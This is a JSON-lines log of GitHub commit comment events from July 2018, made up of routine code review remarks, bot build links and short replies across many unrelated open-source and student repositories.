{"id":"7990901573","type":"CommitCommentEvent","actor":{"login":"zaaraameera2014"},"repo":{"name":"aosp-mirror/platform_frameworks_base"},"payload":{"comment":{"id":29768832,"position":null,"line":null,"path":null,"commit_id":"cb1f5bc41e45f53eae43a61f01fc9e82a7a6e2b0","created_at":"2018-07-19T18:34:12Z","updated_at":"2018-07-19T18:34:12Z","author_association":"NONE","body":"....,..."}},"created_at":"2018-07-19T18:34:12Z"}
{"id":"7990901769","type":"CommitCommentEvent","actor":{"login":"andrewgiessel"},"repo":{"name":"mwaskom/seaborn"},"payload":{"comment":{"id":29768833,"position":null,"line":null,"path":null,"commit_id":"0ef2c2e4561e77054bb0f321089cd6ed0d50c038","created_at":"2018-07-19T18:34:14Z","updated_at":"2018-07-19T18:34:14Z","author_association":"NONE","body":"I've always found it annotation of the jointplot very useful (maybe I'm in the minority).  Is there a better way or more appropriate way to do this in versions 0.9 and onward?\r\n\r\nThanks so much"}},"created_at":"2018-07-19T18:34:14Z"}
{"id":"7990903165","type":"CommitCommentEvent","actor":{"login":"bdw429s"},"repo":{"name":"Ortus-Solutions/TestBox"},"payload":{"comment":{"id":29768838,"position":null,"line":null,"path":null,"commit_id":"1d534ac053ec348d313745c8c39c02b99b3ce8bc","created_at":"2018-07-19T18:34:31Z","updated_at":"2018-07-19T18:34:31Z","author_association":"COLLABORATOR","body":"Makes sense, but when?  Testbox could clear the dir when it first loads, but that would still result in a lot of class generations, it would just slow it down a bit.  "}},"created_at":"2018-07-19T18:34:31Z"}
{"id":"7990905038","type":"CommitCommentEvent","actor":{"login":"Tuckerpham"},"repo":{"name":"Tuckerpham/tuckerpham.github.io"},"payload":{"comment":{"id":29768845,"position":4,"line":88,"path":"_config.yml","commit_id":"671f44c3c5d3da3d219c643be8ef97fc3afb3f9a","created_at":"2018-07-19T18:34:55Z","updated_at":"2018-07-19T18:34:55Z","author_association":"OWNER","body":"ok\r\n"}},"created_at":"2018-07-19T18:34:55Z"}
{"id":"7990912146","type":"CommitCommentEvent","actor":{"login":"Cyberboss"},"repo":{"name":"octokit/octokit.net"},"payload":{"comment":{"id":29768854,"position":15,"line":15,"path":"Octokit/Models/Request/CheckRunUpdate.cs","commit_id":"c5d5df5b08062eb9223427772ba43abd901db149","created_at":"2018-07-19T18:36:20Z","updated_at":"2018-07-19T18:36:20Z","author_association":"CONTRIBUTOR","body":"But as I say that..."}},"created_at":"2018-07-19T18:36:20Z"}
{"id":"7990927817","type":"CommitCommentEvent","actor":{"login":"atzannes"},"repo":{"name":"jkp/pipenv"},"payload":{"comment":{"id":29768891,"position":11,"line":69,"path":"tests/integration/test_install_twists.py","commit_id":"7bb1099269eb62c7dade9ab4238572fb90e4ea78","created_at":"2018-07-19T18:39:30Z","updated_at":"2018-07-19T18:39:30Z","author_association":"NONE","body":"Thanks for writing this test, it's helping me write my own test for some other problem. Is this line still needed?"}},"created_at":"2018-07-19T18:39:30Z"}
{"id":"7990931462","type":"CommitCommentEvent","actor":{"login":"clcit"},"repo":{"name":"snipe/snipe-it"},"payload":{"comment":{"id":29768898,"position":null,"line":null,"path":null,"commit_id":"a0c0b7b1eb8c32b90479a48d42f9aaa8670afa8b","created_at":"2018-07-19T18:40:16Z","updated_at":"2018-07-19T18:40:16Z","author_association":"NONE","body":"Hello,\r\nAfter pulling down the new version of LoginController.php with the php upgrade.php command, our users still could not login with LDAP.  In looking at the file, it looks like 'active' needs to be changed to 'activated' at line 100 also.  After I made this edit, users can login."}},"created_at":"2018-07-19T18:40:16Z"}
{"id":"7990937284","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29768920,"position":null,"line":null,"path":null,"commit_id":"c0352d1cad6f62aa7f434e12c28c405b55afeffc","created_at":"2018-07-19T18:41:25Z","updated_at":"2018-07-19T18:41:25Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/c0352d1cad6f62aa7f434e12c28c405b55afeffc/index.html"}},"created_at":"2018-07-19T18:41:25Z"}
{"id":"7990937509","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29768921,"position":16,"line":16,"path":"app/controllers/users_controller.rb","commit_id":"bb3d69b2d5029da504de300d30d703a1382ccf02","created_at":"2018-07-19T18:41:28Z","updated_at":"2018-07-19T18:41:28Z","author_association":"NONE","body":"remove this space.\r\n"}},"created_at":"2018-07-19T18:41:28Z"}
{"id":"7990938338","type":"CommitCommentEvent","actor":{"login":"shyuep"},"repo":{"name":"materialsproject/custodian"},"payload":{"comment":{"id":29768925,"position":null,"line":null,"path":null,"commit_id":"63a95d11f293ce59cacdf2b717dce4bad0b27e9f","created_at":"2018-07-19T18:41:37Z","updated_at":"2018-07-19T18:41:37Z","author_association":"MEMBER","body":"Pls do not do this. I will release pymatgen and merge when ready."}},"created_at":"2018-07-19T18:41:37Z"}
{"id":"7990945073","type":"CommitCommentEvent","actor":{"login":"ArnavSood"},"repo":{"name":"JuliaNLSolvers/NLsolve.jl"},"payload":{"comment":{"id":29768940,"position":null,"line":null,"path":null,"commit_id":"0188698108b566c529ad317030fe4e5478a32417","created_at":"2018-07-19T18:43:00Z","updated_at":"2018-07-19T18:43:00Z","author_association":"NONE","body":"Hey @AliKarimirad, this is a great start. Here are my thoughts. \r\n\r\n### src/nlsolve/fixedpoint.jl\r\n\r\nLine 30: Good catch. \r\n\r\n### test/fixedpoint/fixedpoint.jl\r\n\r\nLine 88: This is dangerous. Just to be clear, the only reason that this works is because we defined a `f!` function earlier that operates on `f`. In general, you want to have \"hygienic\" tests, where you only work with objects you define nearby. The `!` part of the function name is only a convention; it doesn't actually modify function behavior. \r\n\r\nLines 89, 91, 93: These tests are failing, even though the values look correct. It's because `approx` in Julia uses high precision, but Julia prints in low precision; e.g. \r\n\r\n```\r\njulia> fixedpoint(f!, [.4]).zero\r\n1-element Array{Float64,1}:\r\n 0.567143\r\n\r\njulia> fixedpoint(f!, [.4]).zero[1]\r\n0.567143294481315\r\n```\r\n\r\nAlso, don't forget that Julia makes quantities like `pi` available. So, for example: \r\n\r\n```\r\njulia> fixedpoint(f!, [Float64(π)]).zero\r\n1-element Array{Float64,1}:\r\n 0.0\r\n```\r\n\r\nOther than that, I think this is a great first set of tests. I'll polish this up to get the tests passing, and then we can move on to the next set. "}},"created_at":"2018-07-19T18:43:00Z"}
{"id":"7990946520","type":"CommitCommentEvent","actor":{"login":"NikkiS713"},"repo":{"name":"NikkiS713/Travis-CI-tutorial"},"payload":{"comment":{"id":29768943,"position":null,"line":null,"path":null,"commit_id":"2e10ca3f8f3b42d680d1e95f39ad3607a1c32dc5","created_at":"2018-07-19T18:43:18Z","updated_at":"2018-07-19T18:43:18Z","author_association":"OWNER","body":"Hope it works"}},"created_at":"2018-07-19T18:43:18Z"}
{"id":"7990948339","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29768947,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-19T18:43:40Z","updated_at":"2018-07-19T18:43:40Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-19T18:43:40Z"}
{"id":"7990948376","type":"CommitCommentEvent","actor":{"login":"savionsample"},"repo":{"name":"savionsample/redesigned-couscous"},"payload":{"comment":{"id":29768948,"position":null,"line":null,"path":null,"commit_id":"cababcafe6f5079fd191f2e860433c28f227a660","created_at":"2018-07-19T18:43:41Z","updated_at":"2018-07-19T18:43:41Z","author_association":"OWNER","body":":)"}},"created_at":"2018-07-19T18:43:41Z"}
{"id":"7990949782","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29768951,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-19T18:43:59Z","updated_at":"2018-07-19T18:43:59Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-19T18:43:59Z"}
{"id":"7990951709","type":"CommitCommentEvent","actor":{"login":"Sasinda98"},"repo":{"name":"Sasinda98/CPMS_Project"},"payload":{"comment":{"id":29768956,"position":null,"line":null,"path":null,"commit_id":"8c98eb8c543dd4d73e32f28bb0530e315c6ccf82","created_at":"2018-07-19T18:44:21Z","updated_at":"2018-07-19T18:44:21Z","author_association":"OWNER","body":"Not finalized, work in progress."}},"created_at":"2018-07-19T18:44:21Z"}
{"id":"7990952668","type":"CommitCommentEvent","actor":{"login":"atzannes"},"repo":{"name":"AltSchool/pipenv"},"payload":{"comment":{"id":29768958,"position":8,"line":64,"path":"tests/integration/test_install_twists.py","commit_id":"f9dbb447ea89f6c5fd254eeb4fc3362a14690664","created_at":"2018-07-19T18:44:33Z","updated_at":"2018-07-19T18:44:33Z","author_association":"COLLABORATOR","body":"The use-case is for installing a library that depends on a private repository.\r\n\r\nThis test passes with `v2018.5.18` but fails with `v2018.6.25` and `v2018.7.1`"}},"created_at":"2018-07-19T18:44:33Z"}
{"id":"7990955415","type":"CommitCommentEvent","actor":{"login":"sirTribble"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29768961,"position":39,"line":122,"path":"dist/Frame.lua","commit_id":"88e64ceee9410ee589d808c5e9923e7ec33a48de","created_at":"2018-07-19T18:45:08Z","updated_at":"2018-07-19T18:45:08Z","author_association":"NONE","body":"Hi! Could you please pull this to your master branch\r\nlocal guid = OvaleGUID:UnitGUID(\"target\") or OvaleGUID:UnitGUID(\"focus\") or OvaleGUID:UnitGUID(\"mouseover\") or Ovale.db.profile.apparence.fullAuraScan\r\n\r\nIt will enable updates on mouseover targets and constant updates inFullScan mode (or maybe make another option for this)\r\n\r\nthx!"}},"created_at":"2018-07-19T18:45:08Z"}
{"id":"7990956807","type":"CommitCommentEvent","actor":{"login":"ArnavSood"},"repo":{"name":"JuliaNLSolvers/NLsolve.jl"},"payload":{"comment":{"id":29768968,"position":null,"line":null,"path":null,"commit_id":"0188698108b566c529ad317030fe4e5478a32417","created_at":"2018-07-19T18:45:24Z","updated_at":"2018-07-19T18:45:24Z","author_association":"NONE","body":"Also, I would prefer to use known quantities (like `pi`, 0, ...) instead of decimals. Otherwise, these tests become more regression tests (ensuring that the result is _unchanged_), as opposed to unit tests (ensuring the result is _correct_). "}},"created_at":"2018-07-19T18:45:24Z"}
{"id":"7990959063","type":"CommitCommentEvent","actor":{"login":"HotelCalifornia"},"repo":{"name":"purduesigbots/pros-docs"},"payload":{"comment":{"id":29768971,"position":5,"line":18,"path":"v5/okapi/tutorials/concepts/chassiscontroller.rst","commit_id":"58f6868c62363a396c7bef4b30ebd3142451db87","created_at":"2018-07-19T18:45:53Z","updated_at":"2018-07-19T18:45:53Z","author_association":"MEMBER","body":"also doesn't need a hyphen"}},"created_at":"2018-07-19T18:45:53Z"}
{"id":"7990960245","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29768978,"position":null,"line":null,"path":null,"commit_id":"482a5c3c33c19c34441c74485c38912f66f7cdf8","created_at":"2018-07-19T18:46:08Z","updated_at":"2018-07-19T18:46:08Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/482a5c3c33c19c34441c74485c38912f66f7cdf8/index.html"}},"created_at":"2018-07-19T18:46:08Z"}
{"id":"7990961260","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29768980,"position":49,"line":66,"path":"settings.php","commit_id":"50e1e3e37f502cbf51e30db2057f587a3bdcd064","created_at":"2018-07-19T18:46:20Z","updated_at":"2018-07-19T18:46:20Z","author_association":"MEMBER","body":"@Rohanator9000 Since we are deleting this config, then we need to have an upgrade step in which we delete this config, if it exists:\r\nset_config('apiurl', null, 'mod_zoom');\r\n\r\nSee https://docs.moodle.org/dev/Upgrade_API"}},"created_at":"2018-07-19T18:46:20Z"}
{"id":"7990963522","type":"CommitCommentEvent","actor":{"login":"lewiskhale"},"repo":{"name":"lewiskhale/Branch"},"payload":{"comment":{"id":29768983,"position":null,"line":null,"path":null,"commit_id":"dc7f2420ad74027ea077eae1faa8914dd8c3f212","created_at":"2018-07-19T18:46:49Z","updated_at":"2018-07-19T18:46:49Z","author_association":"OWNER","body":"Mobile Applications and Other Projects... I guess"}},"created_at":"2018-07-19T18:46:49Z"}
{"id":"7990964591","type":"CommitCommentEvent","actor":{"login":"norgor"},"repo":{"name":"norgor/ModbusRTU"},"payload":{"comment":{"id":29768986,"position":null,"line":null,"path":null,"commit_id":"ed0b60ea5e452023ee70d07e1d0eff52ce902b57","created_at":"2018-07-19T18:47:01Z","updated_at":"2018-07-19T18:47:01Z","author_association":"OWNER","body":"I'll keep that in mind, thanks. :)"}},"created_at":"2018-07-19T18:47:01Z"}
{"id":"7990964608","type":"CommitCommentEvent","actor":{"login":"atzannes"},"repo":{"name":"AltSchool/pipenv"},"payload":{"comment":{"id":29768987,"position":25,"line":81,"path":"tests/integration/test_install_twists.py","commit_id":"f9dbb447ea89f6c5fd254eeb4fc3362a14690664","created_at":"2018-07-19T18:47:01Z","updated_at":"2018-07-19T18:47:01Z","author_association":"COLLABORATOR","body":"Using this repo because there isn't a pypi package with that name, so I'm sure to avoid a false-positive in a scenario where pipenv did not use the `dependency_link`, fell-back to pypi, found a package with the desired name, and declared victory. Perhaps that is not necessary though."}},"created_at":"2018-07-19T18:47:01Z"}
{"id":"7990977920","type":"CommitCommentEvent","actor":{"login":"jwill2385"},"repo":{"name":"droid-squad/Natville"},"payload":{"comment":{"id":29769021,"position":null,"line":null,"path":null,"commit_id":"a106ff6b2e42816733ed7805c0cc3eae5a87b425","created_at":"2018-07-19T18:49:39Z","updated_at":"2018-07-19T18:49:39Z","author_association":"NONE","body":"![screen shot 2018-07-19 at 11 45 53 am](https://user-images.githubusercontent.com/40250274/42963658-b5b3b39c-8b49-11e8-99dc-2254dcf1e417.png)\r\n\r\nTested my get Trails function by iterating through each Trail in API for that specific location and distance and then returning the name of each place\r\n"}},"created_at":"2018-07-19T18:49:39Z"}
{"id":"7990998216","type":"CommitCommentEvent","actor":{"login":"ArnavSood"},"repo":{"name":"JuliaNLSolvers/NLsolve.jl"},"payload":{"comment":{"id":29769066,"position":null,"line":null,"path":null,"commit_id":"0188698108b566c529ad317030fe4e5478a32417","created_at":"2018-07-19T18:53:43Z","updated_at":"2018-07-19T18:53:43Z","author_association":"NONE","body":"Last thing- I think the idiom in Julia is not to use semicolons for this stuff. It's totally understandable why you did; there are a bunch of semicolons in there. "}},"created_at":"2018-07-19T18:53:43Z"}
{"id":"7990998437","type":"CommitCommentEvent","actor":{"login":"Katastroffa"},"repo":{"name":"Katastroffa/js2-project"},"payload":{"comment":{"id":29769067,"position":null,"line":null,"path":null,"commit_id":"7c395fda3fe048b4e91b9b99fa82ef7912936e61","created_at":"2018-07-19T18:53:46Z","updated_at":"2018-07-19T18:53:46Z","author_association":"OWNER","body":"add!"}},"created_at":"2018-07-19T18:53:46Z"}
{"id":"7991004012","type":"CommitCommentEvent","actor":{"login":"Katastroffa"},"repo":{"name":"Katastroffa/js2-project"},"payload":{"comment":{"id":29769078,"position":4,"line":3,"path":"first project.js","commit_id":"7c395fda3fe048b4e91b9b99fa82ef7912936e61","created_at":"2018-07-19T18:54:50Z","updated_at":"2018-07-19T18:54:50Z","author_association":"OWNER","body":"add new line!\r\n"}},"created_at":"2018-07-19T18:54:50Z"}
{"id":"7991006954","type":"CommitCommentEvent","actor":{"login":"FooBarWidget"},"repo":{"name":"phusion/passenger"},"payload":{"comment":{"id":29769082,"position":40,"line":500,"path":"src/cxx_supportlib/ServerKit/HttpServer.h","commit_id":"12c37f062edfc5e8ffa209f2f45f550f91e66b8e","created_at":"2018-07-19T18:55:25Z","updated_at":"2018-07-19T18:55:25Z","author_association":"MEMBER","body":"Thanks for pointing this out. But actually now that I think about it, that entire block is not necessary. If I just return `return Channel::Result(event.consumed, false)` then, if there's still more client data, the next time processClientDataWhenParsingChunkedBody() is called it will check for `req->bodyChannel.acceptingInput()` etc anyway."}},"created_at":"2018-07-19T18:55:25Z"}
{"id":"7991016391","type":"CommitCommentEvent","actor":{"login":"hawkeye116477"},"repo":{"name":"MajkiIT/polish-ads-filter"},"payload":{"comment":{"id":29769097,"position":32,"line":3650,"path":"polish-adblock-filters/adblock.txt","commit_id":"40ffa70afb46758a5ee63a40b0eef00543382c8a","created_at":"2018-07-19T18:57:19Z","updated_at":"2018-07-19T18:57:19Z","author_association":"CONTRIBUTOR","body":"Do strony poradnikzdrowie.pl nie powinien być raczej wyjątek na ads.js ?"}},"created_at":"2018-07-19T18:57:19Z"}
{"id":"7991027906","type":"CommitCommentEvent","actor":{"login":"mascah"},"repo":{"name":"Root-App/incubator-airflow"},"payload":{"comment":{"id":29769131,"position":null,"line":null,"path":null,"commit_id":"d30810414aa453b98213b05e03cbfa37c0eb02fe","created_at":"2018-07-19T18:59:42Z","updated_at":"2018-07-19T18:59:42Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Fix Airflow S3 Sensor silent failure](https://trello.com/c/wbgYHBew/424-fix-airflow-s3-sensor-silent-failure)"}},"created_at":"2018-07-19T18:59:42Z"}
{"id":"7991038176","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29769160,"position":70,"line":70,"path":"Lesson_3/station_control.rb","commit_id":"77e65be3dd5c3c0ae2d45dcba8be172bfa573189","created_at":"2018-07-19T19:01:43Z","updated_at":"2018-07-19T19:01:43Z","author_association":"NONE","body":"Конечно, мы же перевернули логику) Забыл исправить\r\n\r\n```\r\nif next_station\r\n  # do your thing\r\n```"}},"created_at":"2018-07-19T19:01:43Z"}
{"id":"7991041443","type":"CommitCommentEvent","actor":{"login":"diversys"},"repo":{"name":"HaikuArchives/Vision"},"payload":{"comment":{"id":29769168,"position":13,"line":159,"path":"src/Makefile","commit_id":"a61969b7897077d252395d7df1f3766f1a341e63","created_at":"2018-07-19T19:02:25Z","updated_at":"2018-07-19T19:02:25Z","author_association":"MEMBER","body":"Leftover?"}},"created_at":"2018-07-19T19:02:25Z"}
{"id":"7991045480","type":"CommitCommentEvent","actor":{"login":"Reapism"},"repo":{"name":"Reapism/Skork"},"payload":{"comment":{"id":29769175,"position":null,"line":null,"path":null,"commit_id":"6a7503511f68f7b58ca80d56e41246274bc02652","created_at":"2018-07-19T19:03:15Z","updated_at":"2018-07-19T19:03:15Z","author_association":"OWNER","body":"It's been a while since a giant commit like this...\r\n\r\nNow, I like to commit each class file separately to be clear to whats changes were made. "}},"created_at":"2018-07-19T19:03:15Z"}
{"id":"7991056900","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29769189,"position":null,"line":null,"path":null,"commit_id":"eb25a9bd708a4a688123190e07081909e9ffeab8","created_at":"2018-07-19T19:05:37Z","updated_at":"2018-07-19T19:05:37Z","author_association":"MEMBER","body":"yeah"}},"created_at":"2018-07-19T19:05:37Z"}
{"id":"7991057321","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29769190,"position":19,"line":63,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-messages-service.js","commit_id":"7739fa9187f0ba64b2a4b69427d5ee81c26e01f5","created_at":"2018-07-19T19:05:43Z","updated_at":"2018-07-19T19:05:43Z","author_association":"MEMBER","body":"Minha sugestão é deixar mais claro que aquele código informado pertence ao lote de transporte onde se encontra a alíquota que o usuário deseja excluir. "}},"created_at":"2018-07-19T19:05:43Z"}
{"id":"7991059812","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29769195,"position":24,"line":67,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-messages-service.js","commit_id":"7739fa9187f0ba64b2a4b69427d5ee81c26e01f5","created_at":"2018-07-19T19:06:14Z","updated_at":"2018-07-19T19:06:14Z","author_association":"MEMBER","body":"Mesma sugestão do comentário acima."}},"created_at":"2018-07-19T19:06:14Z"}
{"id":"7991060996","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29769200,"position":22,"line":78,"path":"otus-business/src/main/java/br/org/otus/laboratory/participant/api/ParticipantLaboratoryFacade.java","commit_id":"9960161b0307c4ef06c33d961ca01bce61d653e8","created_at":"2018-07-19T19:06:29Z","updated_at":"2018-07-19T19:06:29Z","author_association":"MEMBER","body":"Acredito que não é necessário o e.printStackTrace"}},"created_at":"2018-07-19T19:06:29Z"}
{"id":"7991067773","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29769240,"position":35,"line":35,"path":"Homework7/MainL7Ex2.java","commit_id":"ff99b4c5dc9cc11f7fd8d20cbfc103454e723531","created_at":"2018-07-19T19:07:53Z","updated_at":"2018-07-19T19:07:53Z","author_association":"OWNER","body":"Добре було би це об'єднати в один цикл і використати лише одну мапу"}},"created_at":"2018-07-19T19:07:53Z"}
{"id":"7991070768","type":"CommitCommentEvent","actor":{"login":"Tuckerpham"},"repo":{"name":"Tuckerpham/web"},"payload":{"comment":{"id":29769246,"position":null,"line":null,"path":null,"commit_id":"993a2d04b4fa059c768c1b7f73b5f3e30755c84c","created_at":"2018-07-19T19:08:30Z","updated_at":"2018-07-19T19:08:30Z","author_association":"OWNER","body":"this is wrong dude\r\n"}},"created_at":"2018-07-19T19:08:30Z"}
{"id":"7991071227","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29769250,"position":26,"line":26,"path":"Homework7/MainL7Ex3.java","commit_id":"ff99b4c5dc9cc11f7fd8d20cbfc103454e723531","created_at":"2018-07-19T19:08:36Z","updated_at":"2018-07-19T19:08:36Z","author_association":"OWNER","body":"ця команда, анпевно, зайва"}},"created_at":"2018-07-19T19:08:36Z"}
{"id":"7991071767","type":"CommitCommentEvent","actor":{"login":"michelwijnja"},"repo":{"name":"michelwijnja/External_offsets_adaptive_feed_macro_plus"},"payload":{"comment":{"id":29769254,"position":null,"line":null,"path":null,"commit_id":"67c956fe62a79ad8e1c5b7ae1c49f27061268d05","created_at":"2018-07-19T19:08:42Z","updated_at":"2018-07-19T19:08:42Z","author_association":"OWNER","body":"Testing for more M codes. I like M3 and M300 to use. "}},"created_at":"2018-07-19T19:08:42Z"}
{"id":"7991072110","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29769258,"position":37,"line":24,"path":"otus-laboratory/src/main/java/br/org/otus/laboratory/participant/ParticipantLaboratoryDao.java","commit_id":"9960161b0307c4ef06c33d961ca01bce61d653e8","created_at":"2018-07-19T19:08:46Z","updated_at":"2018-07-19T19:08:46Z","author_association":"MEMBER","body":"Como o aliquotCode já vai no parametro do método, poderia ser retirada do nome do método"}},"created_at":"2018-07-19T19:08:46Z"}
{"id":"7991073990","type":"CommitCommentEvent","actor":{"login":"atifsaddique211f"},"repo":{"name":"CTemplar/front-end"},"payload":{"comment":{"id":29769272,"position":31,"line":232,"path":"src/app/mail/mail-sidebar/compose-mail/compose-mail.component.ts","commit_id":"d635a5fc19e51c30778384dcfb4c61d6544c4262","created_at":"2018-07-19T19:09:10Z","updated_at":"2018-07-19T19:09:10Z","author_association":"COLLABORATOR","body":"very bad way to do this.\r\nTake a look how I handled it .\r\nYOu can check it in dev branch"}},"created_at":"2018-07-19T19:09:10Z"}
{"id":"7991079614","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29769303,"position":35,"line":35,"path":"Homework7/Student.java","commit_id":"ff99b4c5dc9cc11f7fd8d20cbfc103454e723531","created_at":"2018-07-19T19:10:22Z","updated_at":"2018-07-19T19:10:22Z","author_association":"OWNER","body":"для чого нам тут ця змінна і для чого приводити тип?\r\nstudent.getNumberofcourse() теж має працювати"}},"created_at":"2018-07-19T19:10:22Z"}
{"id":"7991084215","type":"CommitCommentEvent","actor":{"login":"robladbrook"},"repo":{"name":"sub-prime-test/test-repo"},"payload":{"comment":{"id":29769319,"position":9,"line":9,"path":".gitignore","commit_id":"a7a053c1162165457866a26d70f153bd0ff9c610","created_at":"2018-07-19T19:11:18Z","updated_at":"2018-07-19T19:11:18Z","author_association":"CONTRIBUTOR","body":"Nice!"}},"created_at":"2018-07-19T19:11:18Z"}
{"id":"7991084317","type":"CommitCommentEvent","actor":{"login":"atifsaddique211f"},"repo":{"name":"CTemplar/front-end"},"payload":{"comment":{"id":29769320,"position":5,"line":50,"path":"src/app/store/reducers/mail.reducers.ts","commit_id":"d635a5fc19e51c30778384dcfb4c61d6544c4262","created_at":"2018-07-19T19:11:19Z","updated_at":"2018-07-19T19:11:19Z","author_association":"COLLABORATOR","body":"why to split here,\r\nYou will only discard one item at a time from compose mailbox.\r\nWe are not providing undo delete for batch delete\r\n"}},"created_at":"2018-07-19T19:11:19Z"}
{"id":"7991087745","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29769325,"position":27,"line":27,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-structure-factory.js","commit_id":"7c090d5b7be5720e702f8d1420cf7edfa58017e0","created_at":"2018-07-19T19:12:03Z","updated_at":"2018-07-19T19:12:03Z","author_association":"MEMBER","body":"Remover."}},"created_at":"2018-07-19T19:12:03Z"}
{"id":"7991089771","type":"CommitCommentEvent","actor":{"login":"gcttong"},"repo":{"name":"phac-nml/biohansel"},"payload":{"comment":{"id":29769331,"position":30,"line":25,"path":"bio_hansel/scripts/write_sequence.py","commit_id":"f094037d9569b8290efc2136dc3d3bf58039c2e5","created_at":"2018-07-19T19:12:27Z","updated_at":"2018-07-19T19:12:27Z","author_association":"COLLABORATOR","body":"Yes this has been addressed in commit 3a135f21c95bf2e361a9fb25f117dbe81d724875"}},"created_at":"2018-07-19T19:12:27Z"}
{"id":"7991090564","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29769334,"position":14,"line":14,"path":"week_four/HW7ex1/Sets.java","commit_id":"2927f35ccd137b40c663ccd6e14e6fb03e679503","created_at":"2018-07-19T19:12:36Z","updated_at":"2018-07-19T19:12:36Z","author_association":"OWNER","body":"чому тут TreeSet, нам же не потрібно цю колекцію сортувати"}},"created_at":"2018-07-19T19:12:36Z"}
{"id":"7991097539","type":"CommitCommentEvent","actor":{"login":"zoffixznet"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":29769346,"position":null,"line":null,"path":null,"commit_id":"a68784a6f66cdde0fddb55340ba07e08297e2fde","created_at":"2018-07-19T19:14:04Z","updated_at":"2018-07-19T19:14:04Z","author_association":"CONTRIBUTOR","body":"s/Reverse/Reserve/"}},"created_at":"2018-07-19T19:14:04Z"}
{"id":"7991098507","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29769347,"position":3,"line":3,"path":"app/helpers/users_helper.rb","commit_id":"bb3d69b2d5029da504de300d30d703a1382ccf02","created_at":"2018-07-19T19:14:16Z","updated_at":"2018-07-19T19:14:16Z","author_association":"NONE","body":"lets discuss this tomorrow."}},"created_at":"2018-07-19T19:14:16Z"}
